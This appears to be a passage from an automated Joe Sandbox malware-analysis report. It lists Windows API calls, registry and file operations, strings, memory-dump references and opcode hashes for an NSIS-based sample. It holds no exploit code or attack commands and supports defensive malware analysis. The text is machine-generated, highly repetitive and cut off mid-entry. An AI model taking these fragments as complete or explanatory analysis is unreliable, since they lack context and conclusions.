                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s$@rD
                                        • API String ID: 3540041739-1813061909
                                        • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                        • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                        • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                        • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                        • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                        • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: *?|<>/":
                                        • API String ID: 589700163-165019052
                                        • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                        • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                        • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                        • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Close$DeleteEnumOpen
                                        • String ID:
                                        • API String ID: 1912718029-0
                                        • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                        • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                        • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                        • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                        APIs
                                        • GetDlgItem.USER32(?), ref: 004020A3
                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                        • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                        • Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                        • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                        APIs
                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                        • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                        • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                        • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                        APIs
                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        Strings
                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                        • API String ID: 1697273262-1764544995
                                        • Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                        • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                        • Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                        • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00404902
                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID: $@rD
                                        • API String ID: 3748168415-881980237
                                        • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                        • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                        • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                        • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                        APIs
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                          • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                        • lstrlenW.KERNEL32 ref: 004026B4
                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                        • String ID: CopyFiles "%s"->"%s"
                                        • API String ID: 2577523808-3778932970
                                        • Opcode ID: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                        • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                        • Opcode Fuzzy Hash: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                        • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: lstrcatwsprintf
                                        • String ID: %02x%c$...
                                        • API String ID: 3065427908-1057055748
                                        • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                        • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                        • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                        • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                        APIs
                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringWritelstrcpyn
                                        • String ID: <RM>$PetFunctions$WriteINIStr: wrote [%s] %s=%s in %s
                                        • API String ID: 247603264-320002975
                                        • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                        • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                        • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                        • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 00405057
                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                        • String ID: Section: "%s"$Skipping section: "%s"
                                        • API String ID: 2266616436-4211696005
                                        • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                        • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                        • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                        • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                        APIs
                                        • GetDC.USER32(?), ref: 00402100
                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                        • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                        • String ID:
                                        • API String ID: 1599320355-0
                                        • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                        • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                        • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                        • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                        APIs
                                          • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                        • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                        • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                        • String ID: Version
                                        • API String ID: 512980652-315105994
                                        • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                        • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                        • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                        • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                        • GetTickCount.KERNEL32 ref: 00403303
                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                        • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                        • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                        • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                        • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                        • String ID:
                                        • API String ID: 2883127279-0
                                        • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                        • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                        • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                        • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                        APIs
                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                        • String ID: HideWindow
                                        • API String ID: 1249568736-780306582
                                        • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                        • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                        • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
